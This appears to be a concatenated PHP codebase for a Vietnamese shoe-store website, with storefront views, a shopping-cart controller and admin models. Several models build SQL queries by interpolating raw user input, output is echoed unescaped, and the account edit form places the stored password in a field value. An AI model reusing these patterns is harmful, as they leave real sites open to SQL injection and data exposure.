$a = $_POST['a'];
$b = $_POST['b'];
$data_sanphamcuahang = $this->cuahang_controller->chonsanpham_gia($a, $b);
}else{
$a = null;
$b = null;
}
require_once('views/index.php');
}
}
?><file_sep>/admin/views_admin/layout/layout.php
<body class="hold-transition skin-blue sidebar-mini">
<!-- -->
<div class="wrapper">
<header class="main-header">
<!-- Logo -->
<a href="?action=trangchu" class="logo">
<!-- mini logo for sidebar mini 50x50 pixels -->
<span class="logo-mini"><b>A</b>LT</span>
<!-- logo for regular state and mobile devices -->
<span class="logo-lg"><b></b>ADMIN</span>
</a>
<!-- Header Navbar: style can be found in header.less -->
<nav class="navbar navbar-static-top">
<!-- Sidebar toggle button-->
<a href="#" class="sidebar-toggle" data-toggle="push-menu" role="button">
<span class="sr-only">Toggle navigation</span>
</a>
<div class="navbar-custom-menu" style="margin-right:2%">
<ul class="nav navbar-nav">
<!-- User Account: style can be found in dropdown.less -->
<li class="dropdown user user-menu">
<a href="#">
<span class="hidden-xs"> <?php
if (isset($_SESSION['tendangnhap'])) {
echo "Xin chào " . $_SESSION['tendangnhap'];
} else {
echo "Xin Chào ...";
}
?></span>
</a>
</li>
</ul>
</div>
</nav>
</header>
<!-- Left side column. contains the logo and sidebar -->
<aside class="main-sidebar">
<!-- sidebar: style can be found in sidebar.less -->
<section class="sidebar">
<!-- Sidebar user panel -->
<div class="user-panel">
<div class="pull-left image">
</div>
<div class="pull-left info">
</div>
</div>
<!-- sidebar menu: : style can be found in sidebar.less -->
<ul class="sidebar-menu" data-widget="tree">
<li class="header">LAOYOUT ADMIN</li>
<li>
<a href="?action=loaisanpham">
<i class="fa fa-th"></i> <span>List danh mục</span>
</a>
</li>
<li>
<a href="?action=banner">
<i class="fa fa-th"></i> <span>List Banner</span>
</a>
</li>
<li>
<a href="?action=hoadon">
<i class="fa fa-th"></i> <span>List hóa đơn</span>
</a>
</li>
<li>
<a href="?action=sanpham"">
<i class=" fa fa-th"></i> <span>List sản phẩm</span>
</a>
</li>
<li>
<a href="?action=khuyenmai">
<i class="fa fa-th"></i> <span>List khuyến mãi</span>
</a>
</li>
<li>
<a href="?action=taikhoan">
<i class="fa fa-th"></i> <span>List Tài khoản</span>
<span class="pull-right-container">
<!--<small class="label pull-right bg-green">new</small>-->
</span>
</a>
</li>
</ul>
</section>
<!-- /.sidebar -->
</aside>
<!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
<!-- Content Header (Page header) -->
<!-- Main content -->
<section class="content">
<!-- ./wrapper --><file_sep>/admin/model_admin/banner.php
<?php
// MODEL CHO CÁC THÔNG TIN SẢN PHẨM
require_once('ketnoi.php');
/**
*
*/
class banner
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function all()
{
$query = "SELECT * FROM banner ORDER BY idbanner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function timkiem_bn($timkiem_bn)
{
$query = "SELECT * FROM banner WHERE idbanner LIKE '%$timkiem_bn%' ORDER BY idbanner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function find($id)
{
$query = "SELECT * FROM banner WHERE idbanner=$id";
return $this->conn->query($query)->fetch_assoc();
}
function update($idbanner, $anh)
{
$query="UPDATE banner SET idbanner='$idbanner', anh='$anh' WHERE idbanner='$idbanner' ";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=banner');
}else{
header('Location: ?action=banner');
}
}
function insert($idbanner, $anhbanner)
{
$query= "INSERT INTO banner (idbanner, anh)
VALUES ('$idbanner', '$anhbanner') ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=banner');
}
else{
header('location: ?action=thembanner_giaodien');
}
}
function delete($id) //chưa
{
$query = "DELETE FROM banner WHERE idbanner='$id' ";
$result = $this->conn->query($query);
if($result == true){
echo "<script> ";
echo "location.href='?action=banner';</script>";
}else{
echo "<script>";
echo "location.href='?action=banner';</script>";
}
}
}
?><file_sep>/admin/controller_admin/home.php
<?php
// CONTROLLER <NAME> HÀM TRONG MODEL
require_once('./model_admin/trangchu.php'); // đã gọi được rồi
/**
*
*/
class trangchucontroller
{
var $trangchu_model;
public function __construct()
{
$this->trangchu_model = new trangchu();
}
public function dem()
{
$data_user = $this->trangchu_model->all_user();
$data_sanpham = $this->trangchu_model->all_sanpham();
$data_loaisanpham = $this->trangchu_model->all_loaisanpham();
$data_hoadon = $this->trangchu_model->all_hoadon();
if (isset($_POST['ngay_gui'])) {
$ngay=filter_input(INPUT_POST, 'ngay_gui');
$loai_ngay = filter_input(INPUT_POST, 'ngay_gui');
$thang_nhan = date_create("$ngay");
$thang = date_format($thang_nhan, 'Y-m');
$loai_thang = date_format($thang_nhan, 'Y-m');
$nam_nhan = date_create("$ngay");
$nam = date_format($nam_nhan, 'Y');
$loai_nam = date_format($nam_nhan, 'Y');
}else{
$ngay = date("Y-m-d");
$loai_ngay="Hôm nay";
$thang = date("Y-m");
$loai_thang="này";
$nam = date("Y");
$loai_nam="này";
}
$thongke_hoadon_ngay = $this->trangchu_model->all_hoadon_day($ngay);
$thongke_hoadon_thang = $this->trangchu_model->all_hoadon_day($thang);
$thongke_hoadon_nam = $this->trangchu_model->all_hoadon_day($nam);
$data_banner = $this->trangchu_model->all_banner();
$data_khuyenmai = $this->trangchu_model->all_khuyenmai();
$data_layout = $this->trangchu_model->all_layout();
require_once('views_admin/index.php');
}
public function update_layout()
{
$mail = filter_input(INPUT_POST, 'mail');
$diachi = filter_input(INPUT_POST, 'diachi');
$phone = filter_input(INPUT_POST, 'phone');
$this->trangchu_model->update_layout($mail, $diachi, $phone);
}
}
?><file_sep>/views/cuahang/cuahang.php
<div class="cuahang">
<h1>Cửa Hàng</h1>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Cửa hàng</li>
</ol>
</div>
</div>
</section>
<div class="container cn2">
<div class="row">
<div class="col-sm-3">
<div class="left-sidebar">
<h2>Thể Loại</h2>
<div class="panel-group category-products" id="accordian"><!--category-productsr-->
<?php foreach ($data_loaisanpham as $value) { ?>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title">
<a href="?action=cuahang&id=<?= $value['idLoaiSP'] ?>">
<?= $value['tenLSP'] ?>
</a>
</h4>
</div>
</div>
<?php } ?>
</div>
</div>
<div class="chongia">
<div class="chongia2">
<div class="dropdown" style="float:left; margin-left: 20px; margin-right: 30px;">
<button class="dropbtn">Màu</button>
<div class="dropdown-content" style="left:0;">
<div class="container" style="background-color: white; width: 500px;">
<?php foreach ($color as $value) { ?>
<div class="col-sm-2">
<a href="?action=cuahang&idmau=<?= $value['idcolor'] ?>" class="acolor">
<?php echo $value['color']; ?></a>
</div>
<?php } ?>
</div>
</div>
</div>
<div class="dropdown" style="margin-left: 9px;">
<button class="dropbtn">Size</button>
<div class="dropdown-content" style="left:-50px;">
<div class="container" style="background-color: white; width: 250px;">
<?php foreach ($size as $value) { ?>
<div class="col-sm-2">
<a href="?action=cuahang&idsize=<?= $value['idsize'] ?>" class="acolor">
<?php echo $value['size']; ?></a>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- giá -->
<br>
<br>
</div>
<center><h4>Chọn giá</h4></center>
<div style="">
<form method="POST" action="?action=cuahang1">
<div class="" style="padding: 5px;">
<label>Chọn giá bắt đầu: </label>
<select name="a">
<option value="100">100.000 vnd</option>
<option value="200">200.000 vnd</option>
<option value="300">300.000 vnd</option>
<option value="400">400.000 vnd</option>
<option value="500">500.000 vnd</option>
<option value="600">600.000 vnd</option>
<option value="700">700.000 vnd</option>
<option value="800">800.000 vnd</option>
<option value="900">900.000 vnd</option>
<option value="1000">1.000.000 vnd</option>
</select>
<br>
<br>
<label>Chọn giá Kết thúc: </label>
<select name="b">
<option value="100">100.000 vnd</option>
<option value="200">200.000 vnd</option>
<option value="300">300.000 vnd</option>
<option value="400">400.000 vnd</option>
<option value="500">500.000 vnd</option>
<option value="600">600.000 vnd</option>
<option value="700">700.000 vnd</option>
<option value="800">800.000 vnd</option>
<option value="900">900.000 vnd</option>
<option value="1000">1.000.000 vnd</option>
</select>
<br>
<br>
<center>
<input type="submit" value="Tìm Kiếm">
</center>
</div>
</form>
</div>
<!-- giá -->
</div>
<br>
<br>
</div> <!-- div thứ 3 -->
<div class="col-sm-9 padding-right c_cn2">
<!-- hiển thị sản phẩm -->
<div class="features_items"><!--features_items-->
<h2 class="title text-center">SHOE - STORE</h2>
<?php foreach ($data_sanphamcuahang as $value) { ?>
<div class="col-sm-3">
<div class="single-product">
<div class="product-f">
<a href="#"><img src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="Product Title" class="img-products" /></a>
<div class="actions-btn">
<a href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>">
<center><i style="font-size: 30px;color:black;" class="fa fa-shopping-cart"></i></center>
</a>
<a href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>" data-toggle="modal" >
<center><i style="font-size: 20px;" class="fa fa-eye"></i></center>
</a>
</div>
</div>
<div class="product-dsc">
<p><a href="#"><center> <?php echo $value['tenSP'] ?></center></a></p>
<center>size: <?php echo $value['size'] ?> </center>
<center>Màu: <?php echo $value['color'] ?> </center>
<center>SL trong kho: <?php echo $value['soluong'] ?> </center>
<center>Khuyến mãi: <?php echo "<b class='km_km'>".$value['giatriKM']."%</b>" ?> </center>
<span>
<center>
<?php if($value['giatriKM'] != 0){
echo " <strike><i>".$value['Dongia'].".000 vnd</i></strike><br> ";
echo " <i class='fa fa-arrow-right'></i> ";
echo $value['Dongia'] - ($value['Dongia']*$value['giatriKM']/100).".000 vnd";
}else{
echo "<br>";
echo $value['Dongia'].".000 vnd";
}
?>
</center>
</span>
</div>
</div>
</div>
<?php } ?>
</div><!--features_items-->
<!--
<ul class="pagination">
<li class="active"><a href="">1</a></li>
<li><a href="">2</a></li>
<li><a href="">3</a></li>
<li><a href="">»</a></li>
</ul>
-->
</div>
</div> <!-- div row -->
</div>
<br>
<br>
<br>
<br>
<br>
<style>
b.km_km{
color: red;
}
strike i{
color: black;
font-weight: normal;
}
</style><file_sep>/admin/views_admin/khuyenmai/quanlykhuyenmai.php
<div class="col-md-12">
<?php if ($_SESSION['admin'] == true) { ?>
<div style="margin-bottom:5px;">
<a href="?action=themkhuyenmai_giaodien" class="btn btn-primary">Thêm khuyến mãi</a>
</div>
<?php } else {
} ?>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách khuyến mãi</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">Loại khuyến mãi</th>
<th style="text-align:center;">Giá trị KM(%)</th>
<th style="text-align:center;">Ngày bắt đầu</th>
<th style="text-align:center;">Ngày kết thúc</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $value) : ?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $value['loaiKM'] ?></td>
<td><?= $value['giatriKM'] ?></td>
<td><?= $value['ngaybatdau'] ?></td>
<td><?= $value['ngayketthuc'] ?></td>
<td>
<!-- để ý dấu bằng trong href -->
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=suakhuyenmai_giaodien&id=<?= $value['idKM'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoakhuyenmai&id=<?= $value['idKM'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa ">
<i class="fa fa-times"></i></a>
<?php } else {
} ?>
</td>
</tr>
<?php endforeach ?>
</td>
</tr>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div><file_sep>/admin/views_admin/taikhoan/sua.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h4>Database nguoidung</h4>
<div style="background-color: #e5e5e5; padding: 10px 50px 10px; color:gray;">
<form action="?action=sua_xl" method="post"> <!-- model_admin/sua_xl.php -->
<table border="0" cellpadding="10">
<tr>
<td>idUser: </td>
<td>
<input disabled type="text" name="id" value=<?php echo $data['idUser']; ?>>
<input type="hidden" name="id" value=<?php echo $data['idUser']; ?> >
</td>
</tr>
<tr>
<td>họ:</td>
<td><input required type="text" name="ho" value=<?php echo $data['ho']; ?> ></td>
</tr>
<tr>
<td>tên:</td>
<td><input required type="text" name="ten" value=<?php echo $data['ten']; ?>></td>
</tr>
<tr>
<td>email:</td>
<td><input id="email" required type="text" name="email" value=<?php echo $data['email']; ?>></td>
</tr>
<tr>
<td>địa chỉ:</td>
<td><input required type="text" name="diachi" value=<?php echo $data['diachi']; ?>></td>
</tr>
<tr>
<td>Giới tính:</td>
<td>
<input type="radio" name="gioitinh" value="nam" checked>Nam
<input type="radio" name="gioitinh" value="nu" >Nữ
</td>
</tr>
<tr>
<td>số điện thoại:</td>
<td><input required type="text" name="sodienthoai" value=<?php echo $data['sodienthoai']; ?>></td>
</tr>
<tr>
<td>tên đăng nhập:</td>
<td><input required type="text" name="tendangnhap" value=<?php echo $data['tendangnhap']; ?>></td>
</tr>
<tr>
<td>mật khẩu:</td>
<td><input required disabled type="password" name="matkhau" value=<?php echo $data['matkhau']; ?>></td>
</tr>
<tr>
<td colspan="2"><button style="width: 100px; background-color: darkgray;" type="submit">Sửa</button></td>
</tr>
</table>
</form>
</div>
</div>
</div>
<file_sep>/admin/views_admin/hoadon/lsist.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h4>Database hoadon</h4>
<div class="search_box pull-right" style="margin-right: 50px; margin-top: 0px;">
<form method="POST" action="?action=hoadon">
<input type="text" placeholder="Search By idUser" name="timkiem_hd"> 
<button type="submit"><i class="fa fa-search"></i></button>
<a href="?action=hoadon" style="font-size: 15px;">All</a>
</form>
</div>
<br>
<br>
<table border="3" cellpadding="10" style="font-size: 15px;">
<thead>
<tr>
<th>idhoadon</th>
<th class="theadd">idUser</th>
<th class="theadd">idSP</th>
<th class="theadd">Tổng tiền</th>
<th class="theadd">Ngày mua</th>
<th class="theadd">Số lượng mua</th>
<th class="theadd">Trạng thái</th>
<th>Hành động</th>
</tr>
</thead>
<tbody>
<?php foreach ($data as $value) { ?>
<tr>
<td scope="row"><?= $value['idhoadon'] ?></td>
<td><?= $value['idUser'] ?> </td>
<td><?= $value['idSP'] ?></td>
<td><?= $value['tongtien'] ?>.000 VND</td>
<td><?= $value['ngaymua']?></td>
<td><?= $value['soluongmua'] ?></td>
<td>
<?php if($value['trangthai'] == 0){
echo "Chưa Xét duyệt";
}else{
echo "Đã duyệt";
} ?>
</td>
<td>
<!-- để ý dấu bằng trong href -->
<a href="?action=xemhoadon&id=<?= $value['idhoadon'] ?>&idSP=<?= $value['idSP'] ?>&idUser=<?= $value['idUser'] ?>" type="button" class="btn btn-light">Chi tiết</a>
<?php if($_SESSION['admin'] == true){ ?>
<?php if($value['trangthai'] == 0){ ?>
<a href="?action=duyethoadon&id=<?= $value['idhoadon'] ?>&idSP=<?= $value['idSP'] ?>&soluongmua=<?php echo $value['soluongmua'] ?>" type="button" class="btn btn-primary">Duyệt hóa đơn</a>
<?php }else{} ?>
<a href="?action=xoahoadon&id=<?= $value['idhoadon'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa">
<i class="fa fa-times"></i></a>
<?php }else{} ?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
<br>
<br>
<br>
</div>
</div>
<file_sep>/admin/views_admin/sanpham/sua.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h4>Database sanpham</h4>
<div style="background-color: #e5e5e5; padding: 10px 50px 10px; color:gray;">
<form action="?action=suasanpham_xl" method="post" enctype="multipart/form-data" > <!-- model_admin/sua_xl.php -->
<table border="0" cellpadding="10">
<input type="hidden" value="<?php echo $data['idSP'];?>" name="idSP">
<tr>
<td>idLoaiSP:</td>
<td>
<select name="idLoaiSP">
<?php foreach ($data_lsp as $value) {?>
<?php echo "<option value='".$value['idLoaiSP']."'>".$value['tenLSP']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>Loại Khuyến mãi:</td>
<td>
<select name="idKM">
<?php foreach ($data_km as $value) {?>
<?php echo "<option value='".$value['idKM']."'>".$value['loaiKM']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>id màu:</td>
<td>
<select name="idmau">
<?php foreach ($data_mau as $value) {?>
<?php echo "<option value='".$value['idcolor']."'>".$value['color']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>id size:</td>
<td>
<select name="idsize">
<?php foreach ($data_size as $value) {?>
<?php echo "<option value='".$value['idsize']."'>".$value['size']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>Tên Sản Phẩm:</td>
<td><input type="text" name="tenSP" value="<?php echo $data['tenSP'];?>" required></td>
</tr>
<tr>
<td>Đơn giá:</td>
<td><input type="text" value="<?php echo $data['Dongia'];?>" name="Dongia" required> .000 VND</td>
</tr>
<tr>
<td>ảnh 1:</td>
<td><input type="file" value="<?php echo $data['anh1'];?>" name="anh1"></td>
</tr>
<tr>
<td>ảnh 2:</td>
<td><input type="file" name="anh2"></td>
</tr>
<tr>
<td>ảnh 3:</td>
<td><input type="file" name="anh3"></td></td>
</tr>
<tr>
<td>Ngày nhập:</td>
<td><input type="date" value="<?php echo $data['ngaynhap'];?>" name="ngaynhap" required></td>
</tr>
<tr>
<td>Số lượng:</td>
<td><input type="text" value="<?php echo $data['soluong'];?>" name="soluong" required></td>
</tr>
<tr>
<td>mô tả:</td>
<td style="width: 150%;">
<form action="_posteddata.php" method="post">
<textarea name="mota" value="<?php echo $data['mota'];?>" cols="" rows="" required></textarea>
<!-- <input name="ok" type="submit" value="Ok" /> -->
</form>
</td>
</tr>
<tr>
<td colspan="2"><button style="width: 100px; background-color: darkgray;" type="submit">Sửa</button></td>
</tr>
</table>
</form>
<br>
<br>
<br>
</div>
</div>
</div>
<script type="text/javascript" >
CKEDITOR.replace( 'mota' );
</script><file_sep>/admin/model_admin/loaisanpham.php
<?php
// MODEL CHO CÁC THÔNG TIN SẢN PHẨM
require_once('ketnoi.php');
/**
*
*/
class loaisanpham
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function allCate()
{
$query = "SELECT * FROM loaisanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all()
{
$query = "SELECT * FROM loaisanpham ORDER BY idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function timkiem_lsp($timkiem_lsp)
{
$query = "SELECT * FROM loaisanpham WHERE tenLSP LIKE '%$timkiem_lsp%' ORDER BY idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function find($id)
{
$query = "SELECT * FROM loaisanpham WHERE idLoaiSP=$id";
return $this->conn->query($query)->fetch_assoc();
}
function update($idLoaiSP, $tenLSP)
{
$query="UPDATE loaisanpham SET tenLSP='$tenLSP'WHERE idLoaiSP='$idLoaiSP' ";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=loaisanpham');
}
}
function insert($tenLSP)
{
$query= "INSERT INTO loaisanpham (tenLSP)
VALUES ('$tenLSP') ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=loaisanpham');
}
else{
header('location: ?action=themloaisanpham_giaodien');
}
}
function delete($id) //đang
{
$query = "DELETE FROM loaisanpham WHERE idLoaiSP='$id' ";
$result = $this->conn->query($query);
if($result == true){
echo "<script> ";
echo "location.href='?action=loaisanpham';</script>";
}else{
echo "<script> ";
echo "location.href='?action=loaisanpham';</script>";
}
}
}
?><file_sep>/controller/giohang_controller.php
<?php
require_once('./model/giohang.php');
/**
*
*/
class giohang_controller
{
var $giohang_controller;
function __construct()
{
$this->giohang_controller = new giohang();
}
public function list_giohang() // okie
{
$data_loaisanpham = $this->giohang_controller->loaisanpham();
// từ dòng này xuống dưới không sử dụng
$data_chitietSP = array();
for($i=0 ; $i<count($data_loaisanpham); $i++){
$data_chitietSP[$i] = $this->giohang_controller->chitiet_sp($i);
}
//chwua cần tới, để đếm tổng tất cả sản phẩm trong giỏ hàng
$count = 0;
if (isset($_SESSION['sanpham'])) {
foreach ($_SESSION['sanpham'] as $value) {
$count += $value['soluong'];
}
}
require_once('views/index.php');
}
function add_giohang() // okie
{
$id = $_GET['id'];
$data = $this->giohang_controller->chitiet_sp($id);
$count = 0;
if (isset($_SESSION['sanpham'][$id])) {
$arr = $_SESSION['sanpham'][$id];
$arr['soluong'] = $arr['soluong'] + 1;
$arr['soluong_kho'] = $data['soluong'] - 1;//
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
$_SESSION['sanpham'][$id] = $arr;
} else {
$arr['idSP'] = $data['idSP'];
$arr['tenSP'] = $data['tenSP'];
$arr['Dongia'] = $data['Dongia'];
$arr['soluong'] = 1;
$arr['soluong_kho'] = $data['soluong']-1;//
$arr['thanhtien'] = $data['Dongia'];
$arr['anh1'] = $data['anh1'];
$_SESSION['sanpham'][$id] = $arr;
}
foreach ($_SESSION['sanpham'] as $value) {
$count += $value['thanhtien'];
}
header('Location:?action=giohang&act=list_giohang');
}
function update_giohang()
{
$arr = $_SESSION['sanpham'][$_GET['id']];
if($arr['soluong_kho'] <= 0 ){
$arr['soluong'] = $arr['soluong'];
$arr['soluong_kho'] = $arr['soluong_kho'];
}else{
$arr['soluong'] = $arr['soluong'] + 1;
$arr['soluong_kho'] = $arr['soluong_kho'] - 1;//
}
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
$_SESSION['sanpham'][$_GET['id']] = $arr;
header('Location:?action=giohang&act=list_giohang');
}
function update_giohang_tru()
{
$arr = $_SESSION['sanpham'][$_GET['id']];
$arr['soluong'] = $arr['soluong'] - 1;
$arr['soluong_kho'] = $arr['soluong_kho'] + 1;//
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
$_SESSION['sanpham'][$_GET['id']] = $arr;
header('Location:?action=giohang&act=list_giohang');
if($arr['soluong'] == 0 || $arr['soluong'] < 0 ){
unset($_SESSION['sanpham'][$_GET['id']]);
}
}
/// Xóa giỏ hàng
function delete_cart() //okie
{
$id = $_GET['id'];
$arr = $_SESSION['sanpham'][$id];
if ($arr['soluong'] == 1) {
unset($_SESSION['sanpham'][$_GET['id']]);
} else {
$arr = $_SESSION['sanpham'][$_GET['id']];
$arr['soluong'] = $arr['soluong'] - 1;
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
$_SESSION['sanpham'][$_GET['id']] = $arr;
}
header('Location: ?action=giohang&act=list_giohang');
}
function deleteall_cart() // okie
{
unset($_SESSION['sanpham']);
unset($_SESSION['thanhtien']); // thêm để hủy sesion
unset($_SESSION['tongtien']); // thêm để hủy sesion
header('Location: ?action=giohang&act=list_giohang');
}
}
?><file_sep>/views/header/header.php
<div class="header-middle"><!--header-middle-->
<div class="row row_header">
<div class="col-sm-6" style="color: gray;">
<div class="dropdown" style="float:left;">
<button class="dropbtnn">Dịch Vụ Khách Hàng
<i class="fa fa-caret-down"></i>
</button>
<div class="dropdown-content" style="left:0;">
<a href="?action=gioithieu">Giới thiệu cửa hàng</a>
<a href="#lienhe">Thông tin liên hệ</a>
<a href="#">Gửi phản hồi</a>
</div>
</div>
<span class="kedoc">|</span>
Open: <?php echo $_SESSION['time'] ?>   Mail: <?php echo $_SESSION['mail_1'] ?>  Phone:(+84) <?php echo $_SESSION['phone_1'] ?>
</div>
<div class="col-sm-6">
<div class="shop-menu pull-right">
<ul class="nav navbar-nav">
<!-- đăng ký -->
<li>
<div class="dropdown221">
<?php if(!isset($_SESSION['tendangnhap'])){ ?>
<i class="fa fa-plus img_user" title="Tài Khoản">
<a href="?action=dangnhap" class="dangkya">Đăng ký </a></i>
<?php }else{
} ?>
</div>
</li>
<!-- đăng nhập -->
<li>
<div class="dropdown22">
<i class="fa fa-user img_user" title="Tài Khoản">
<?php if(isset($_SESSION['tendangnhap'])){
echo 'Chào '.$_SESSION['tendangnhap'];
}else{
echo ' Đăng nhập';
}
?>
</i>
<div class="dropdown-content22">
<!-- <a class="aacount" href="#"><center><span>Đăng nhập</span></center></a>-->
<ul>
<?php if(isset($_SESSION['tendangnhap'])){ ?>
<li></li>
<li><a class="aacount" style="margin-left: -40px;" href="?action=taikhoan&ten=<?php echo $_SESSION['tendangnhap']; ?>"><span>Tài khoản</span></a></li><br>
<li><a class="aacount" href="?action=dangxuat" onclick="TBdangxuat()"><span>Đăng xuất</span></a></li>
<?php if($_SESSION['admin'] == true || $_SESSION['banhang'] == true){ ?>
<li>
<a class="aacount" href="admin/index.php?action=trangchu"><span>Trang quản lý</span></a>
</li>
<?php }}else{ ?>
<li><center><b class="hd_kh">Khách hàng<br><br></b></center></li>
<li><a class="aacount" href="?action=dangnhap"><span>Đăng nhập</span></a></li>
<?php } ?>
</ul>
</div>
</div>
</li>
</ul>
</div>
</div>
</div>
</div>
<div class="header-bottom"><!--header-bottom-->
<div class="container">
<div class="row">
<div class="col-sm-9">
<div class="mainmenuu pull-left">
<ul class="nav navbar-nav collapse navbar-collapse">
<li><a href="?action=trangchu" class="active">
<div class="btn-group">
<img src="public/image/logo.png" alt="logo" title="về trang chủ">
</div>
</a></li>
<li class="dropdown"><a href="?action=cuahang1">Cửa Hàng</a></li>
<!-- lấy action là id loại sản phẩm -->
<?php foreach ($data_loaisanpham as $value) { ?>
<li class="dropdown"><a href="?action=cuahang&id=<?= $value['idLoaiSP'] ?>" style="font-size: 15px;"><?= $value['tenLSP'] ?></a></li>
<?php } ?>
</ul>
</div>
</div>
<form method="POST" action="?action=cuahang1">
<div class="col-sm-3">
<div class="search_box pull-right">
<input type="text" placeholder="Search By Name" name="timkiem_sp"> 
<button type="submit"><i class="fa fa-search"></i></button>
<a id="a1" href="?action=giohang&?act=list_giohang"> <i class="fa fa-shopping-cart" title="Giỏ Hàng Của Bạn"></i> </a>
</div>
</div>
</form>
</div>
</div>
</div>
<!-- end header bottom -->
<!-- /header -->
<script>
function TBdangxuat() {
alert("Bạn muốn đăng xuất?");
}
</script><file_sep>/admin/views_admin/hoadon/quanlyhoadon.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Danh sách hóa đơn</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">ID hóa đơn</th>
<th style="text-align:center;">Tên Khách Hàng</th>
<th style="text-align:center;">Tên sản phẩm</th>
<th style="text-align:center;">Tổng tiền</th>
<th style="text-align:center;">Ngày mua</th>
<th style="text-align:center;">Số lượng mua</th>
<th style="text-align:center;">Trạng thái</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $value) : ?>
<tr>
<td><?= $stt++ ?></td>
<td><?= $value['idhoadon'] ?></td>
<?php
foreach ($user as $row) :
if ($value['idUser'] == $row['idUser']) {
?>
<td><?= $row['ho'] . " " . $row['ten']; ?></td>
<?php }
endforeach ?>
<?php
foreach ($sanpham as $row) :
if ($value['idSP'] == $row['idSP']) {
?>
<td><?=$row['tenSP'] ?></td>
<?php }
endforeach ?>
<td><?= number_format($value['tongtien']) ?> VND</td>
<td><?= $value['ngaymua'] ?></td>
<td><?= $value['soluongmua'] ?></td>
<td>
<?php if ($value['trangthai'] == 0) {
echo "Chưa Xét duyệt";
} else {
echo "Đã duyệt";
} ?>
</td>
<td>
<!-- để ý dấu bằng trong href -->
<?php if ($_SESSION['admin'] == true) { ?>
<?php if ($value['trangthai'] == 0) { ?>
<a href="?action=duyethoadon&id=<?= $value['idhoadon'] ?>&idSP=<?= $value['idSP'] ?>&soluongmua=<?php echo $value['soluongmua'] ?>" type="button" class="btn btn-primary">Duyệt hóa đơn</a>
<?php } else {
} ?>
<a href="?action=xoahoadon&id=<?= $value['idhoadon'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa">
<i class="fa fa-times"></i></a>
<?php } else {
} ?>
</td>
</tr>
<?php
endforeach;
?>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<!-- end content -->
</div><file_sep>/model/danhmuc.php
<?php
require_once('ketnoi.php');
/**
*
*/
class danhmuc
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
}
?><file_sep>/admin/views_admin/trangchu/trangchu.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-body">
<h1><NAME></h1>
<form action="?action=trangchu" method="POST">
<input type="date" name="ngay_gui">
<input type="submit" value="Gửi">
</form>
<br>
<div class="col-sm-4">
<div class="div1">
Doanh thu <?php echo $loai_ngay; ?><br>
- Có <?php $dem1 = 0;
$tongthu1 = 0;
foreach ($thongke_hoadon_ngay as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1; ?></span> hóa đơn<br>
